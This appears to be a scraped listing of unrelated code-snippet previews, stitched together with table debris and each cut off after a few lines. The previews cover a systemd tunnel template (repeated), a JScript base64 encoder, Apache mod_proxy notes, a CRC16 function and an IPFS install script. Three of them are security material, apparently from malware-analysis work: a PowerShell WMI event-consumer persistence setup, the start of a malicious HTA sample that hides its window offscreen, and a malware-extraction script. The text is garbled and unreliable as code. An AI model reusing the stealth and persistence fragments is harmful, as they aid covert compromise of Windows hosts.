Create a template service file at /etc/systemd/system/[email protected]. The template parameter will correspond to the name
of target host:
[Unit]
Description=Setup a secure tunnel to %I
After=network.target| var fsDoOverwrite = true // Overwrite file with base64 code | |
| var fsAsASCII = false // Create base64 code file as ASCII file | |
| var adTypeBinary = 1 // Binary file is encoded | |
| function encode(from, to) { | |
| var inputStream = WScript.CreateObject("ADODB.Stream"); | |
| inputStream.Type = adTypeBinary | |
| inputStream.Open(); | |
| inputStream.LoadFromFile(from); | |
| http://www.hackersgarage.com/install-mod_proxy-apache-module-on-whmcpanel-ceentos-linux-server.html | |
| Installation : | |
| Check Apache current version : | |
| /usr/local/apache/bin/httpd -v | |
| Output : | |
| Server version: Apache/2.2.19 (Unix) |
| uint16_t crc16(char* pData, int length) | |
| { | |
| uint8_t i; | |
| uint16_t wCrc = 0xffff; | |
| while (length--) { | |
| wCrc ^= *(unsigned char *)pData++ << 8; | |
| for (i=0; i < 8; i++) | |
| wCrc = wCrc & 0x8000 ? (wCrc << 1) ^ 0x1021 : wCrc << 1; | |
| } | |
| return wCrc & 0xffff; |
| license: gpl-3.0 |
Create a template service file at /etc/systemd/system/[email protected]. The template parameter will correspond to the name
of target host:
[Unit]
Description=Setup a secure tunnel to %I
After=network.target| # PowerShell 2.0+ | |
| # Description: Powershell script to add Event Consumer | |
| # Original Template (Eventlog Consumer) attributed to @mattifestation: https://gist.github.com/mattifestation/aff0cb8bf66c7f6ef44a | |
| # Set Variables | |
| $Name = 'StagingLocation_Example' | |
| $Query = 'SELECT * FROM __InstanceCreationEvent WITHIN 30 WHERE TargetInstance ISA "CIM_DataFile" AND TargetInstance.Drive = "C:" AND TargetInstance.Path = "\\Windows\\VSS\\"' | |
| $EventNamespace = 'root/cimv2' | |
| $Class = 'ActiveScriptEventConsumer' |
| #!/bin/bash | |
| #pick your IPFS version | |
| VERS=0.4.13 | |
| DIST="go-ipfs_v${VERS}_linux-amd64.tar.gz" | |
| sudo apt-get update | |
| sudo apt-get install golang-go -y | |
| wget https://dist.ipfs.io/go-ipfs/v0.4.13/$DIST | |
| tar xvfz $DIST |
| ## uploaded by @JohnLaTwC | |
| ## sample hash: 1d37e2a657ccc595c7a5544df6fd2d35739455f3fdbc2d2700835873130befde | |
| <html> | |
| <head> | |
| <script language="JScript"> | |
| window.resizeTo(1, 1); | |
| window.moveTo(-2000, -2000); | |
| window.blur(); | |
| try |
| #extract malware from: 9e6ff58202f6c1bd2381e8209231efd0ef6855db59db975fb5b75041706ed104 | |
| import re | |
| import sys | |
| import zlib | |
| import struct | |
| import hashlib | |
| import oledump | |
| import olefile | |
| import binascii | |
| import cStringIO |